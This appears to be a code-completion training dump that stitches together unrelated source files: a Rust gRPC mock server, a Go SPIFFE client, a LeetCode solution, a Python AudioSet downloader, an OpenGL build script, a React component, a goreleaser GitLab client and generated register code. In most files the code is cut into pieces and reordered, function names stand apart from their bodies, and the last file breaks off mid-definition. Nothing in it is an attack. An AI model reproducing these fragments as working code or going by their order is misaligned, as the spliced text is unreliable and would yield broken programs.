self.received_messages.lock().unwrap().push((
message.descriptor().name().to_string(),
Box::new(message),
Instant::now(),
));
}
fn display_all<D: Debug>(items: &[D]) -> String {
items
.iter()
.map(|i| format!("{:?}\n", i))
.collect::<Vec<_>>()
.concat()
}
fn send_next_operation_unary(
&self,
sink: grpcio::UnarySink<super::bazel_protos::operations::Operation>,
) {
match self
.mock_execution
.operation_responses
.lock()
.unwrap()
.pop_front()
{
Some((op, duration)) => {
if let Some(d) = duration {
sleep(d);
}
sink.success(op.clone());
}
None => {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::InvalidArgument,
Some("Did not expect further requests from client.".to_string()),
));
}
}
}
fn send_next_operation_stream(
&self,
ctx: grpcio::RpcContext,
sink: grpcio::ServerStreamingSink<super::bazel_protos::operations::Operation>,
) {
match self
.mock_execution
.operation_responses
.lock()
.unwrap()
.pop_front()
{
Some((op, duration)) => {
if let Some(d) = duration {
sleep(d);
}
ctx.spawn(
sink
.send((op.clone(), grpcio::WriteFlags::default()))
.map(|mut stream| stream.close())
.map(|_| ())
.map_err(|_| ()),
)
}
None => ctx.spawn(
sink
.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::InvalidArgument,
Some("Did not expect further requests from client.".to_string()),
))
.map(|_| ())
.map_err(|_| ()),
),
}
}
}
impl bazel_protos::remote_execution_grpc::Execution for MockResponder {
// We currently only support the one-shot "stream and disconnect" client behavior.
// If we start supporting the "stream updates" variant, we will need to do so here.
fn execute(
&self,
ctx: grpcio::RpcContext,
req: bazel_protos::remote_execution::ExecuteRequest,
sink: grpcio::ServerStreamingSink<bazel_protos::operations::Operation>,
) {
self.log(req.clone());
if self.mock_execution.execute_request != req |
self.send_next_operation_stream(ctx, sink);
}
fn wait_execution(
&self,
_ctx: grpcio::RpcContext,
_req: bazel_protos::remote_execution::WaitExecutionRequest,
_sink: grpcio::ServerStreamingSink<bazel_protos::operations::Operation>,
) {
unimplemented!()
}
}
impl bazel_protos::operations_grpc::Operations for MockResponder {
fn get_operation(
&self,
_: grpcio::RpcContext,
req: bazel_protos::operations::GetOperationRequest,
sink: grpcio::UnarySink<bazel_protos::operations::Operation>,
) {
self.log(req.clone());
self.send_next_operation_unary(sink)
}
fn list_operations(
&self,
_: grpcio::RpcContext,
_: bazel_protos::operations::ListOperationsRequest,
sink: grpcio::UnarySink<bazel_protos::operations::ListOperationsResponse>,
) {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::Unimplemented,
None,
));
}
fn delete_operation(
&self,
_: grpcio::RpcContext,
_: bazel_protos::operations::DeleteOperationRequest,
sink: grpcio::UnarySink<bazel_protos::empty::Empty>,
) {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::Unimplemented,
None,
));
}
fn cancel_operation(
&self,
_: grpcio::RpcContext,
_: bazel_protos::operations::CancelOperationRequest,
sink: grpcio::UnarySink<bazel_protos::empty::Empty>,
) {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::Unimplemented,
None,
));
}
}
| {
ctx.spawn(
sink
.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::InvalidArgument,
Some("Did not expect this request".to_string()),
))
.map_err(|_| ()),
);
return;
} |
client.go | package main
import (
"bufio"
"context"
"fmt"
"io"
"log"
"os"
"time"
"github.com/spiffe/go-spiffe/v2/spiffeid"
"github.com/spiffe/go-spiffe/v2/spiffetls"
"github.com/spiffe/go-spiffe/v2/spiffetls/tlsconfig"
"github.com/spiffe/go-spiffe/v2/workloadapi"
)
const (
socketPath = "unix:///tmp/agent.sock"
)
func | () {
// Setup context
ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
defer cancel()
// Allowed SPIFFE ID
//trust domain and workload id passed as arguments
spiffeID := spiffeid.Must(os.Args[4], os.Args[5])
//hostname and port for server passed as arguments
serverAddress := os.Args[2] + ":" + os.Args[3]
conn, err := spiffetls.DialWithMode(ctx, "tcp", serverAddress,
spiffetls.MTLSClientWithSourceOptions(
tlsconfig.AuthorizeID(spiffeID),
workloadapi.WithClientOptions(workloadapi.WithAddr(socketPath)),
))
if err != nil {
log.Fatalf("could not create TLS connection: %v", err)
}
defer conn.Close()
//string argv will be sent as message
message := os.Args[1] + "\n"
log.Printf("Client sent: %q", message)
// Send a message to the server using the TLS connection
fmt.Fprint(conn, message)
// Read server response
status, err := bufio.NewReader(conn).ReadString('\n')
if err != nil && err != io.EOF {
log.Fatalf("Unable to read server response: %v", err)
}
log.Printf("Server replied: %q", status)
}
| main |
1239. Maximum Length of a Concatenated String with Unique Characters.go | package leetcode
import (
"math/bits"
)
func maxLength(arr []string) int {
c, res := []uint32{}, 0 | mask = mask | 1<<(c-'a')
}
if len(s) != bits.OnesCount32(mask) { // 如果字符串本身带有重复的字符,需要排除
continue
}
c = append(c, mask)
}
dfs(c, 0, 0, &res)
return res
}
func dfs(c []uint32, index int, mask uint32, res *int) {
*res = max(*res, bits.OnesCount32(mask))
for i := index; i < len(c); i++ {
if mask&c[i] == 0 {
dfs(c, i+1, mask|c[i], res)
}
}
return
}
func max(a, b int) int {
if a > b {
return a
}
return b
} | for _, s := range arr {
var mask uint32
for _, c := range s { |
as_download.py | '''
================================================
DOWNLOAD_AUDIOSET REPOSITORY
================================================
Original:
repository name: download_audioset
repository version: 1.0
repository link: https://github.com/jim-schwoebel/download_audioset
author: Jim Schwoebel
author contact: [email protected]
description: downloads the raw audio files from AudioSet (released by Google).
license category: opensource
license: Apache 2.0 license
organization name: NeuroLex Laboratories, Inc.
location: Seattle, WA
website: https://neurolex.ai
release date: 2018-11-08
Edit:
repository name: download_audioset
repository version: 1.1
repository link: https://github.com/frozenburst/download_audioset
author: POYU WU
release date: 2020-11-10
This code (download_audioset) is hereby released under a Apache 2.0 license license.
For more information, check out the license terms below.
================================================
SPECIAL NOTES
================================================
This script parses through the entire balanced audioset dataset and downloads
all the raw audio files. The files are arranged in folders according to their
representative classes.
Please ensure that you have roughly 35GB of free space on your computer before
downloading the files. Note that it may take up to 2 days to fully download
all the files.
Enjoy! - :)
#-Jim
================================================
LICENSE TERMS
================================================
Copyright 2018 NeuroLex Laboratories, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
================================================
SERVICE STATEMENT
================================================
If you are using the code written for a larger project, we are
happy to consult with you and help you with deployment. Our team
has >10 world experts in Kafka distributed architectures, microservices
built on top of Node.js / Python / Docker, and applying machine learning to
model speech and text data.
We have helped a wide variety of enterprises - small businesses,
researchers, enterprises, and/or independent developers.
If you would like to work with us let us know @ [email protected].
usage: as_download.py [options]
options:
--data_pth=<data path>
--label_pth=<labels.xlsx>
--segment_file=<xlsx file>
--partial=<0, 1, 2, ...> # The unbalance csv could split to parts for parallel.
'''
################################################################################
## IMPORT STATEMENTS ##
################################################################################
import pafy, os, shutil, time, ffmpy
import os.path as op
import pandas as pd
import soundfile as sf
from natsort import natsorted
from tqdm import tqdm
from pathlib import Path
from docopt import docopt
################################################################################
## HELPER FUNCTIONS ##
################################################################################
#function to clean labels
def convertlabels(sortlist,labels,textlabels):
clabels=list()
# Debug for sortlist data type, split with each label ids.
sortlist = sortlist.split(',')
for i in range(len(sortlist)):
#find index in list corresponding
index=labels.index(sortlist[i])
clabel=textlabels[index]
#pull out converted label
clabels.append(clabel)
return clabels
def download_audio(link):
listdir=os.listdir()
cmd = f"youtube-dl --quiet -f 'bestaudio[ext=m4a]' '{link}'"
print(cmd)
os.system(cmd)
listdir2=os.listdir()
filename=''
for i in range(len(listdir2)):
if listdir2[i] not in listdir and listdir2[i].endswith('.m4a'):
filename=listdir2[i]
break
return filename
################################################################################
## MAIN SCRIPT ##
################################################################################
if __name__ == '__main__':
args = docopt(__doc__)
print(args)
data_pth = args['--data_pth']
label_pth = args['--label_pth']
segment_file = args['--segment_file']
partial = args['--partial']
if data_pth is None:
raise ValueError("Please set the path for model's output.")
if label_pth is None:
raise ValueError("Please set the path for model's output.")
if segment_file is None:
raise ValueError("Please set the path for model's output.")
if partial is not None:
print("Partial detected. The naming of wav would follow the partial name.")
defaultdir=os.getcwd() | #load labels of the videos
#number, label, words
loadfile=pd.read_excel(label_pth)
number=loadfile.iloc[:,0].tolist()
labels=loadfile.iloc[:,1].tolist()
textlabels=loadfile.iloc[:,2].tolist()
#remove spaces for folders
for i in range(len(textlabels)):
textlabels[i]=textlabels[i].replace(' ','')
#now load data for download
xlsx_filename = segment_file
if op.isfile(xlsx_filename) is False:
raise ValueError("Xlsx file of segment is not exits with value:", xlsx_filename)
loadfile2=pd.read_excel(xlsx_filename)
# ylabels have to be cleaned to make a good list (CSV --> LIST)
yid=loadfile2.iloc[:,0].tolist()[2:]
ystart=loadfile2.iloc[:,1].tolist()[2:]
yend=loadfile2.iloc[:,2].tolist()[2:]
ylabels=loadfile2.iloc[:,3].tolist()[2:]
dataset_dir = data_pth
if op.isdir(dataset_dir) is False:
raise ValueError("Dataset directory is not exits with path:", dataset_dir)
#make folders
if partial is not None:
# segment_folder_name = op.basename(xlsx_filename).split('.')[0]
# Easy method is the best solution.
segment_folder_name = 'unbalanced_train_segments'
else:
segment_folder_name = op.basename(xlsx_filename).split('.')[0]
try:
defaultdir2=op.join(dataset_dir, segment_folder_name)
os.chdir(defaultdir2)
except:
defaultdir2=op.join(dataset_dir, segment_folder_name)
os.mkdir(defaultdir2)
os.chdir(defaultdir2)
# Should implement the check of existed file as well.
# Implemented by frozenburst
existing_wavfiles=list()
for dirname in tqdm(sorted(Path(defaultdir2).glob('*'))):
if partial is not None:
for filename in sorted(Path(dirname).glob(f'{partial}_*')):
existing_wavfiles.append(op.basename(filename))
else:
for filename in sorted(Path(dirname).glob(f'*')):
existing_wavfiles.append(op.basename(filename))
# get last file checkpoint to leave off
existing_wavfiles=natsorted(existing_wavfiles)
print(existing_wavfiles)
try:
lastfile=int(existing_wavfiles[-1].split('.')[0][7:])
except:
lastfile=0
#iterate through entire CSV file, look for '--' if found, find index, delete section, then go to next index
slink='https://www.youtube.com/watch?v='
for i in tqdm(range(len(yid))):
if i < lastfile:
# print('Skipping, already downloaded file...')
continue
else:
link=slink+yid[i]
start=float(ystart[i])
end=float(yend[i])
# print(ylabels[i])
clabels=convertlabels(ylabels[i],labels,textlabels)
# print(clabels)
if clabels != []:
#change to the right directory
for j in range(len(clabels)):
newdir = op.join(defaultdir2, clabels[j])
if op.isdir(newdir) is False:
os.mkdir(newdir)
os.chdir(newdir)
#if it is the first download, pursue this path to download video
lastdir=os.getcwd()
if partial is not None:
filename_check = f'{partial}_snipped'+str(i)+'.wav'
else:
filename_check = 'snipped'+str(i)+'.wav'
if filename_check not in os.listdir():
try:
# use YouTube DL to download audio
filename=download_audio(link)
extension='.m4a'
#get file extension and convert to .wav for processing later
os.rename(filename,'%s%s'%(str(i),extension))
filename='%s%s'%(str(i),extension)
if extension not in ['.wav']:
xindex=filename.find(extension)
filename=filename[0:xindex]
ff=ffmpy.FFmpeg(
inputs={filename+extension:None},
outputs={filename+'.wav':None}
)
ff.run()
os.remove(filename+extension)
file=filename+'.wav'
data,samplerate=sf.read(file)
totalframes=len(data)
totalseconds=totalframes/samplerate
startsec=start
startframe=samplerate*startsec
endsec=end
endframe=samplerate*endsec
# print(startframe)
# print(endframe)
if partial is not None:
newname = f'{partial}_snipped'+file
else:
newname = 'snipped'+file
sf.write(newname, data[int(startframe):int(endframe)], samplerate)
snippedfile=newname
os.remove(file)
except:
print('no urls')
#sleep 3 second sleep to prevent IP from getting banned
time.sleep(2)
else:
print('skipping, already downloaded file...') | os.chdir(defaultdir)
|
main.rs | extern crate gl_generator;
use gl_generator::{Registry, Api, Profile, Fallbacks};
use std::env;
use std::fs::File;
use std::io::Write;
use std::path::Path;
mod textures;
fn main() {
let dest = env::var("OUT_DIR").unwrap();
let dest = Path::new(&dest);
textures::build_texture_file(&mut File::create(&dest.join("textures.rs")).unwrap());
println!("cargo:rerun-if-changed=build/main.rs");
let mut file_output = File::create(&dest.join("gl_bindings.rs")).unwrap();
generate_gl_bindings(&mut file_output);
}
fn | <W>(dest: &mut W) where W: Write {
let gl_registry = Registry::new(
Api::Gl,
(4, 5),
Profile::Compatibility,
Fallbacks::None,
vec![
"GL_AMD_depth_clamp_separate",
"GL_APPLE_vertex_array_object",
"GL_ARB_bindless_texture",
"GL_ARB_buffer_storage",
"GL_ARB_compute_shader",
"GL_ARB_copy_buffer",
"GL_ARB_debug_output",
"GL_ARB_depth_texture",
"GL_ARB_direct_state_access",
"GL_ARB_draw_buffers",
"GL_ARB_ES2_compatibility",
"GL_ARB_ES3_compatibility",
"GL_ARB_ES3_1_compatibility",
"GL_ARB_ES3_2_compatibility",
"GL_ARB_framebuffer_sRGB",
"GL_ARB_geometry_shader4",
"GL_ARB_gpu_shader_fp64",
"GL_ARB_gpu_shader_int64",
"GL_ARB_invalidate_subdata",
"GL_ARB_multi_draw_indirect",
"GL_ARB_occlusion_query",
"GL_ARB_pixel_buffer_object",
"GL_ARB_robustness",
"GL_ARB_shader_image_load_store",
"GL_ARB_shader_objects",
"GL_ARB_texture_buffer_object",
"GL_ARB_texture_float",
"GL_ARB_texture_multisample",
"GL_ARB_texture_rg",
"GL_ARB_texture_rgb10_a2ui",
"GL_ARB_transform_feedback3",
"GL_ARB_vertex_buffer_object",
"GL_ARB_vertex_shader",
"GL_ATI_draw_buffers",
"GL_ATI_meminfo",
"GL_EXT_debug_marker",
"GL_EXT_direct_state_access",
"GL_EXT_framebuffer_blit",
"GL_EXT_framebuffer_multisample",
"GL_EXT_framebuffer_object",
"GL_EXT_framebuffer_sRGB",
"GL_EXT_gpu_shader4",
"GL_EXT_packed_depth_stencil",
"GL_EXT_provoking_vertex",
"GL_EXT_texture_array",
"GL_EXT_texture_buffer_object",
"GL_EXT_texture_compression_s3tc",
"GL_EXT_texture_filter_anisotropic",
"GL_EXT_texture_integer",
"GL_EXT_texture_sRGB",
"GL_EXT_transform_feedback",
"GL_GREMEDY_string_marker",
"GL_KHR_robustness",
"GL_NVX_gpu_memory_info",
"GL_NV_conditional_render",
"GL_NV_vertex_attrib_integer_64bit",
],
);
let gles_registry = Registry::new(
Api::Gles2,
(3, 1),
Profile::Compatibility,
Fallbacks::None,
vec![
"GL_ANGLE_framebuffer_multisample",
"GL_APPLE_framebuffer_multisample",
"GL_APPLE_sync",
"GL_ARM_rgba8",
"GL_EXT_buffer_storage",
"GL_EXT_disjoint_timer_query",
"GL_EXT_multi_draw_indirect",
"GL_EXT_multisampled_render_to_texture",
"GL_EXT_occlusion_query_boolean",
"GL_EXT_primitive_bounding_box",
"GL_EXT_robustness",
"GL_KHR_debug",
"GL_NV_copy_buffer",
"GL_NV_framebuffer_multisample",
"GL_NV_internalformat_sample_query",
"GL_NV_pixel_buffer_object",
"GL_OES_depth_texture",
"GL_OES_draw_elements_base_vertex",
"GL_OES_packed_depth_stencil",
"GL_OES_primitive_bounding_box",
"GL_OES_rgb8_rgba8",
"GL_OES_texture_buffer",
"GL_OES_texture_npot",
"GL_OES_vertex_array_object",
"GL_OES_vertex_type_10_10_10_2",
],
);
(gl_registry + gles_registry)
.write_bindings(gl_generator::StructGenerator, dest)
.unwrap();
}
| generate_gl_bindings |
SignInPhones.tsx | import React from 'react'
const SignInPhones: React.FC = () => {
return ( | alt="Phones"
draggable="false"
/>
<img
className="h-[69%] absolute top-24 right-[3.75rem]"
src="/phone-content.jpeg"
alt="Phone Content"
draggable="false"
/>
</div>
)
}
export default SignInPhones | <div className="relative hidden md:inline-block">
<img
className="h-[37rem] relative"
src="/phones.png" |
linspace.rs |
use std::iter;
use std::num::{Float, NumCast};
/// An iterator of `n` evenly spaced floats.
///
/// Iterator element type is `F`.
pub type Linspace<F> = iter::Take<iter::Counter<F>>;
/// Return an iterator with `n` elements, where the first
/// element is `a` and the last element is `b`.
///
/// Iterator element type is `F`.
///
/// ```
/// use itertools as it;
/// let mut xs = it::linspace::<f32>(0., 1., 5);
/// assert_eq!(xs.collect::<Vec<_>>(),
/// vec![0., 0.25, 0.5, 0.75, 1.0]);
/// ```
#[inline]
pub fn | <F: Float>(a: F, b: F, n: usize) -> Linspace<F>
{
if n != 0 {
let nf: F = NumCast::from(n).unwrap();
let step = (b - a)/(nf - Float::one());
iter::count(a, step).take(n)
} else {
iter::count(a, Float::one()).take(n)
}
}
| linspace |
gitlab.go | package client
import (
"crypto/tls"
"errors"
"net/http"
"os"
"strings"
"github.com/apex/log"
"github.com/goreleaser/goreleaser/internal/artifact"
"github.com/goreleaser/goreleaser/internal/tmpl"
"github.com/goreleaser/goreleaser/pkg/config"
"github.com/goreleaser/goreleaser/pkg/context"
"github.com/xanzy/go-gitlab"
)
// ErrExtractHashFromFileUploadURL indicates the file upload hash could not ne extracted from the url
var ErrExtractHashFromFileUploadURL = errors.New("could not extract hash from gitlab file upload url")
type gitlabClient struct {
client *gitlab.Client
}
// NewGitLab returns a gitlab client implementation
func NewGitLab(ctx *context.Context) (Client, error) {
token := ctx.Token
transport := &http.Transport{
TLSClientConfig: &tls.Config{
// nolint: gosec
InsecureSkipVerify: ctx.Config.GitLabURLs.SkipTLSVerify,
},
}
var options = []gitlab.ClientOptionFunc{
gitlab.WithHTTPClient(&http.Client{
Transport: transport,
}),
}
if ctx.Config.GitLabURLs.API != "" {
options = append(options, gitlab.WithBaseURL(ctx.Config.GitLabURLs.API))
}
client, err := gitlab.NewClient(token, options...)
if err != nil {
return &gitlabClient{}, err
}
return &gitlabClient{client: client}, nil
}
// CreateFile gets a file in the repository at a given path
// and updates if it exists or creates it for later pipes in the pipeline
func (c *gitlabClient) CreateFile(
ctx *context.Context,
commitAuthor config.CommitAuthor,
repo config.Repo,
content []byte, // the content of the formula.rb
path, // the path to the formula.rb
message string, // the commit msg
) error {
fileName := path
// we assume having the formula in the master branch only
ref := "master"
branch := "master"
opts := &gitlab.GetFileOptions{Ref: &ref}
castedContent := string(content)
projectID := repo.Owner + "/" + repo.Name
log.WithFields(log.Fields{
"owner": repo.Owner,
"name": repo.Name,
}).Debug("projectID at brew")
_, res, err := c.client.RepositoryFiles.GetFile(projectID, fileName, opts)
if err != nil && (res == nil || res.StatusCode != 404) {
log.WithFields(log.Fields{
"fileName": fileName,
"ref": ref,
"projectID": projectID,
"statusCode": res.StatusCode,
"err": err.Error(),
}).Error("error getting file for brew formula")
return err
}
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
}).Debug("found already existing brew formula file")
if res.StatusCode == 404 {
log.WithFields(log.Fields{
"fileName": fileName,
"ref": ref,
"projectID": projectID,
}).Debug("creating brew formula")
createOpts := &gitlab.CreateFileOptions{
AuthorName: &commitAuthor.Name,
AuthorEmail: &commitAuthor.Email,
Content: &castedContent,
Branch: &branch,
CommitMessage: &message,
}
fileInfo, res, err := c.client.RepositoryFiles.CreateFile(projectID, fileName, createOpts)
if err != nil {
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"statusCode": res.StatusCode,
"err": err.Error(),
}).Error("error creating brew formula file")
return err
}
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"filePath": fileInfo.FilePath,
}).Debug("created brew formula file")
return nil
}
log.WithFields(log.Fields{
"fileName": fileName,
"ref": ref,
"projectID": projectID,
}).Debug("updating brew formula")
updateOpts := &gitlab.UpdateFileOptions{
AuthorName: &commitAuthor.Name,
AuthorEmail: &commitAuthor.Email,
Content: &castedContent,
Branch: &branch,
CommitMessage: &message,
}
updateFileInfo, res, err := c.client.RepositoryFiles.UpdateFile(projectID, fileName, updateOpts)
if err != nil {
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"statusCode": res.StatusCode,
"err": err.Error(),
}).Error("error updating brew formula file")
return err
}
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"filePath": updateFileInfo.FilePath,
"statusCode": res.StatusCode,
}).Debug("updated brew formula file")
return nil
}
// CreateRelease creates a new release or updates it by keeping
// the release notes if it exists
func (c *gitlabClient) CreateRelease(ctx *context.Context, body string) (releaseID string, err error) {
title, err := tmpl.New(ctx).Apply(ctx.Config.Release.NameTemplate)
if err != nil {
return "", err
}
projectID := ctx.Config.Release.GitLab.Owner + "/" + ctx.Config.Release.GitLab.Name
log.WithFields(log.Fields{
"owner": ctx.Config.Release.GitLab.Owner,
"name": ctx.Config.Release.GitLab.Name,
}).Debug("projectID")
name := title
tagName := ctx.Git.CurrentTag
release, resp, err := c.client.Releases.GetRelease(projectID, tagName)
if err != nil && (resp == nil || resp.StatusCode != 403) {
return "", err
}
if resp.StatusCode == 403 {
log.WithFields(log.Fields{
"err": err.Error(),
}).Debug("get release")
description := body
ref := ctx.Git.Commit
gitURL := ctx.Git.URL
log.WithFields(log.Fields{
"name": name,
"description": description,
"ref": ref,
"url": gitURL,
}).Debug("creating release")
release, _, err = c.client.Releases.CreateRelease(projectID, &gitlab.CreateReleaseOptions{
Name: &name,
Description: &description,
Ref: &ref,
TagName: &tagName,
})
if err != nil {
log.WithFields(log.Fields{
"err": err.Error(),
}).Debug("error create release")
return "", err
}
log.WithField("name", release.Name).Info("release created")
} else {
desc := body
if release != nil && release.DescriptionHTML != "" {
desc = release.DescriptionHTML
}
release, _, err = c.client.Releases.UpdateRelease(projectID, tagName, &gitlab.UpdateReleaseOptions{
Name: &name,
Description: &desc,
})
if err != nil {
log.WithFields(log.Fields{
"err": err.Error(),
}).Debug("error update release")
return "", err
}
log.WithField("name", release.Name).Info("release updated")
}
return tagName, err // gitlab references a tag in a repo by its name
}
// Upload uploads a file into a release repository
func (c *gitlabClient) Upload(
ctx *context.Context,
releaseID string,
artifact *artifact.Artifact,
file *os.File,
) error {
projectID := ctx.Config.Release.GitLab.Owner + "/" + ctx.Config.Release.GitLab.Name
log.WithField("file", file.Name()).Debug("uploading file")
projectFile, _, err := c.client.Projects.UploadFile(
projectID,
file.Name(),
nil,
)
if err != nil {
return err
}
log.WithFields(log.Fields{
"file": file.Name(),
"url": projectFile.URL,
}).Debug("uploaded file")
gitlabBaseURL := ctx.Config.GitLabURLs.Download
// projectFile.URL from upload: /uploads/<hash>/filename.txt
linkURL := gitlabBaseURL + "/" + projectID + projectFile.URL
name := artifact.Name
releaseLink, _, err := c.client.ReleaseLinks.CreateReleaseLink(
projectID,
releaseID,
&gitlab.CreateReleaseLinkOptions{
Name: &name,
URL: &linkURL,
})
if err != nil {
return RetriableError{err}
}
log.WithFields(log.Fields{
"id": releaseLink.ID,
"url": releaseLink.URL,
}).Debug("created release link")
fileUploadHash, err := extractProjectFileHashFrom(projectFile.URL)
if err != nil {
return err
}
// for checksums.txt the field is nil, so we initialize it
if artifact.Extra == nil {
artifact.Extra = make(map[string]interface{})
}
// we set this hash to be able to download the file
// in following publish pipes like brew, scoop
artifact.Extra["ArtifactUploadHash"] = fileUploadHash
return nil
}
// extractProjectFileHashFrom extracts the hash from the
// relative project file url of the format '/uploads/<hash>/filename.ext'
func extractProjectFileHashFrom(projectFileURL string) (string, error) | {
log.WithField("projectFileURL", projectFileURL).Debug("extract file hash from")
splittedProjectFileURL := strings.Split(projectFileURL, "/")
if len(splittedProjectFileURL) != 4 {
log.WithField("projectFileURL", projectFileURL).Debug("could not extract file hash")
return "", ErrExtractHashFromFileUploadURL
}
fileHash := splittedProjectFileURL[2]
log.WithFields(log.Fields{
"projectFileURL": projectFileURL,
"fileHash": fileHash,
}).Debug("extracted file hash")
return fileHash, nil
} |
|
dier.rs | #[doc = r" Value read from the register"]
pub struct R {
bits: u32,
}
#[doc = r" Value to write to the register"]
pub struct W {
bits: u32,
}
impl super::DIER {
#[doc = r" Modifies the contents of the register"]
#[inline]
pub fn modify<F>(&self, f: F)
where
for<'w> F: FnOnce(&R, &'w mut W) -> &'w mut W,
{
let bits = self.register.get();
let r = R { bits: bits };
let mut w = W { bits: bits };
f(&r, &mut w);
self.register.set(w.bits);
}
#[doc = r" Reads the contents of the register"]
#[inline]
pub fn read(&self) -> R {
R {
bits: self.register.get(),
}
}
#[doc = r" Writes to the register"]
#[inline]
pub fn write<F>(&self, f: F)
where
F: FnOnce(&mut W) -> &mut W,
{
let mut w = W::reset_value();
f(&mut w);
self.register.set(w.bits);
}
#[doc = r" Writes the reset value to the register"]
#[inline]
pub fn reset(&self) {
self.write(|w| w)
}
}
#[doc = r" Value of the field"]
pub struct TDER {
bits: bool,
}
impl TDER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct COMDER {
bits: bool,
}
impl COMDER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct CC1DER {
bits: bool,
}
impl CC1DER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct UDER {
bits: bool,
}
impl UDER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
| #[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct BIER {
bits: bool,
}
impl BIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct TIER {
bits: bool,
}
impl TIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct COMIER {
bits: bool,
}
impl COMIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct CC1IER {
bits: bool,
}
impl CC1IER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct UIER {
bits: bool,
}
impl UIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Proxy"]
pub struct _TDEW<'a> {
w: &'a mut W,
}
impl<'a> _TDEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 14;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _COMDEW<'a> {
w: &'a mut W,
}
impl<'a> _COMDEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 13;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _CC1DEW<'a> {
w: &'a mut W,
}
